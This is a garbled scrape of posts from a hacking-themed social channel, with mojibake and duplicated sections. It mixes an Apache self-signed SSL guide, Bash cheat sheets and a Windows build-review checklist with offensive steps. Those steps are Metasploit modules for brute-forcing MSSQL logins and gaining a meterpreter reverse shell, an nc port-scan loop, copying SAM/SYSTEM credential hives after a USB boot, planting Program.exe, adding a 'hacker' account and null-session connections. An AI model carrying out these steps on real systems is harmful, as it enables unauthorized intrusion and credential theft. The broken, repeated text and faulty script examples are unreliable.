msf exploit(psexec) > exploit
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BUILD YOUR OWN ApacheSSL:
# Enabling Self signed certificates on local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self signed SSL certificates:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Put the default-ssl site available creating a symbolic link
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BUILD YOUR OWN ApacheSSL:
# Enabling Self signed certificates on local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self signed SSL certificates:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Put the default-ssl site available creating a symbolic link
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Sslshopper
How to Create and Install an Apache Self Signed Certificate
Learn how to create an Apache self signed certificate to secure your Apache web server with SSL for free.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AttackingMSSQL -
Attacking MSSQL with Metasploit
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AttackingMSSQL -
Attacking MSSQL with Metasploit
Enumerate MSSQL Servers on the network:β git topic
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
[>] Enumerate MSSQL Database:
msf > use auxiliary/admin/mssql/mssql_enum
[>] Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Simple Bash Scripting :
+ nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.
+ Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file
+ Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp
+ How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
+ pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
+ Processes
ps aux Show all running process for all users.
kill -9 PID Nicely kill a PID.
+ Word Count
wc -l tmp2 Count the number of lines in a file
+ cut
-d delimiter
-f fields
+ sort
Sort by unique sort -u file
sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
+ awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
+ grep
grep -v Remove a single string.
grep -v 'red' file
+ egrep -v
Remove multiple strings egrep -v '(red|white|blue)' file
+ sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Simple Bash Scripting :
+ nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.
+ Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file
+ Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp
+ How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
+ pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
+ Processes
ps aux Show all running process for all users.
kill -9 PID Nicely kill a PID.
+ Word Count
wc -l tmp2 Count the number of lines in a file
+ cut
-d delimiter
-f fields
+ sort
Sort by unique sort -u file
sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
+ awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
+ grep
grep -v Remove a single string.
grep -v 'red' file
+ egrep -v
Remove multiple strings egrep -v '(red|white|blue)' file
+ sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create a Bash Scripts Example :
+ Simple bash script:
#!/bin/bash
clear
echo
echo
print "Hello world."
+ Make a file executable.
chmod +x file
chmod 755 file
+ Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.
#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=
+ User Input
read -p "Domain: " domain
#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain
+ Check For No User Input
if -z $domain ; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
exit
fi
+ For loops
#!/bin/bash
for host in $(cat hosts.txt)
do
command $host
done
+ One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done
+ Condition Onliner
any command && if work || if not work
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"
+ Condition Onliner with multiple action
any command && { if work; also this; also this } || { if not work; also this; also this }
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass } || { echo "MassDns not installed"; echo "Install MassDns" }
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create a Bash Scripts Example :
+ Simple bash script:
#!/bin/bash
clear
echo
echo
print "Hello world."
+ Make a file executable.
chmod +x file
chmod 755 file
+ Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.
#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=
ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1
echo "Hello" $name "Your IP address is:" $ip+ User Input
read -p "Domain: " domain
#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain
+ Check For No User Input
if -z $domain ; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
exit
fi
+ For loops
#!/bin/bash
for host in $(cat hosts.txt)
do
command $host
done
+ One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done
+ Condition Onliner
any command && if work || if not work
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"
+ Condition Onliner with multiple action
any command && { if work; also this; also this } || { if not work; also this; also this }
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass } || { echo "MassDns not installed"; echo "Install MassDns" }
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ A good guide helpful Build Review :
+ Main tasks:
Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign Eicar test file.
USB policy and removable media access (including firewire, CD etc).
Disk encryption (if relevant)
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).
+ Windows Hosts:
+ Server Roles
+ Server Manager
+ System Properties
+ Default Domain Policy
+ Global Domain Policy
+ Net accounts/Users/groups/Administrators
+ IPConfig/Routing
+ Installed Programs
+ Installed System Updates
+ AV Version/Definition Dates
+ Check Computer folders
+ Firewall Configuration
+ Audit Policy
+ Password/Lockout Policy
+ Security Policy
+ User Rights Policy
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ A good guide helpful Build Review :
+ Main tasks:
Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign Eicar test file.
USB policy and removable media access (including firewire, CD etc).
Disk encryption (if relevant)
BIOS passwords set.
Proxy settings (if relevant).
Nessus Scan (With Credentials).
+ Windows Hosts:
+ Server Roles
+ Server Manager
+ System Properties
+ Default Domain Policy
+ Global Domain Policy
+ Net accounts/Users/groups/Administrators
+ IPConfig/Routing
+ Installed Programs
+ Installed System Updates
+ AV Version/Definition Dates
+ Check Computer folders
+ Firewall Configuration
+ Audit Policy
+ Password/Lockout Policy
+ Security Policy
+ User Rights Policy
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Decrypting_TLS_Browser_Traffic_With_Wireshark_β_The_Easy_Way!.pdf
1 MB
Decrypting TLS Browser Traffic With Wireshark β The Easy Way!
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Helpful systeminfo command
#requested
1οΈβ£BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)
2οΈβ£Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update
3οΈβ£Anti-Virus
- config
- logs
- version
- dates
- EICAR
4οΈβ£cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\IP addressorhost name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist
5οΈβ£mount usb
usb autostart
6οΈβ£copy over files
- nc
- enum
- nmap
- DIRE
- EICAR
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Helpful systeminfo command
#requested
1οΈβ£BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)
2οΈβ£Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update
3οΈβ£Anti-Virus
- config
- logs
- version
- dates
- EICAR
4οΈβ£cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\IP addressorhost name\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist
5οΈβ£mount usb
usb autostart
6οΈβ£copy over files
- nc
- enum
- nmap
- DIRE
- EICAR
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β